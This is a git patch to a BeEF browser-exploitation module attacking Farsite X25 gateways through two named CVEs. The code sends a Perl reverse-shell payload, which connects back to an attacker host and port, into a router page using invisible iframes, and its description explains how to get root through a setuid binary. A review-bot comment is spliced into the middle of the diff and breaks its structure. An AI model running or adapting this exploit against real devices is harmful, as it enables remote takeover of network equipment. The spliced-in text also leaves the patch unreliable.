From fbac8cd55ae5b7e6ff6791ec039eb88e94d124a8 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Fri, 7 Oct 2016 05:20:49 +0000 Subject: [PATCH] Update PR #1301 --- modules/exploits/farsite_x25_remote_shell/command.js | 8 +------- modules/exploits/farsite_x25_remote_shell/config.yaml | 2 +- 2 files changed, 2 insertions(+), 8 deletions(-) diff --git a/modules/exploits/farsite_x25_remote_shell/command.js b/modules/exploits/farsite_x25_remote_shell/command.js index de120be7a..1c107739b 100644 --- a/modules/exploits/farsite_x25_remote_shell/command.js +++ b/modules/exploits/farsite_x25_remote_shell/command.js @@ -6,22 +6,16 @@ beef.execute(function() { var lhost = '<%= @lhost %>'; var lport = '<%= @lport %>'; - - writefile = function() { var revshell='use+IO;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}'; revshell = revshell + '$c=new IO::Socket::INET(PeerAddr,"' + lhost + ':' + lport +'");'; revshell = revshell + 'STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'; - //var x25_write_iframe_<%= @command_id %>= beef.dom.createInvisibleIframe(); var x25w_<%= @command_id %>= beef.dom.createInvisibleIframe(); var uri = scheme + '://' + rhost + "/fsSaveUIPersistence.php?strSubmitData=" + revshell; //About to hit uri x25w_<%= @command_id %>.setAttribute('src', uri); }; - validate = function() { - }; - exploit = function() { //Command injecting on the router var x25e_<%= @command_id %> = beef.dom.createInvisibleIframe(); @@ -31,7 +25,7 @@ beef.execute(function() { try { writefile(); - setTimeout(exploit,3000); + setTimeout(exploit,5000); } catch (e) { beef.debug(peer + " - Exploit failed: " + e.message); } diff --git a/modules/exploits/farsite_x25_remote_shell/config.yaml b/modules/exploits/farsite_x25_remote_shell/config.yaml index 0c03bc878..ccc8b8d2e 100644 --- a/modules/exploits/farsite_x25_remote_shell/config.yaml +++ b/modules/exploits/farsite_x25_remote_shell/config.yaml 
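Review bot: The `catch` in the second command.js hunk cannot report a failure inside `exploit`, because `setTimeout(exploit,5000)` only schedules the call and the `try` block has already exited when the timer fires; only a synchronous throw from `writefile()` reaches `beef.debug`. That debug line also reads `peer`, which no visible line declares (the hunk starts at line 25 of the new file, so it may be defined above); if it is not, the handler itself raises a ReferenceError and the failure message is lost, and `rhost` from the first hunk looks like the intended name, as in `beef.debug(rhost + " - Exploit failed: " + e.message);`. The delay is a bare constant, so a comment such as `// give the first request time to finish before the second is sent` would record why 3000 was raised to 5000. The enclosing `beef.execute` callback starts and ends outside the hunk.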
@@ -5,7 +5,7 @@ beef:
 enable: true
 category: "Exploits"
 name: "Farsite X25 gateway remote code execution"
- description: "This module exploits CVE-2014- to write a payload to the router and CVE-2014- to execute it. Once you have shell you can use the setuid /http/bin/execCmd to execute commands as root."
+ description: "This module exploits CVE-2014-7175 to write a payload to the router and CVE-2014-7173 to execute it. Once you have shell you can use the setuid /http/bin/execCmd to execute commands as root."
 authors: ["Wireghoul"]
 target:
 working: ["All"]